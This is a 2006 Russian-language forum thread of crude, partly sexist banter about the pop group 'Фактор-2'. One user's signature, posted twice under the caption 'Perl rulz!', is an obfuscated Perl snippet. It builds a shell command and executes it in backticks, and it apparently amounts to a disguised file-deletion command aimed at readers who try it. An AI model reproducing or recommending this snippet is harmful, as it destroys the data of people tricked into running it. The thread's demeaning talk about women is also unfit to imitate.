Пацаны,кто может похвалится тем,что его прет хруппа Фактор??Никто,я думаю...А между тем ,это мощнейший инструмент для обламывания телок определенного сорта....Проверено...имейте ввиду,еслиф что....
Если меня на компе появится немного факторов два бл*ть.у меня комп от переполнения попсы лопнет(28 мп3 вроде насчитал полного опопосения) _________________ Где такой Я!!
Все правильно девачка говорит - отстала ты от нее на световые годы...
А вабще,эта группа показывает,какими могут быть кабелеукладчики из Немецыии...хы-хы...
Добавлено: Пн Фев 06, 2006 9:35 am Заголовок сообщения:
щас тут кое-кто довыебывается и перестанет быть таким "загадкой" _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Чт Фев 23, 2006 2:57 am Заголовок сообщения:
Фактор ,это типа те моральные уроды, такие лысые под школьников косят и что-то про красавицу там поют?
И ещё это они там завывают что-то про белые кораблики? _________________ АЙС
Lobzik
понятия не имею, ибо далек от названий русских групп _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!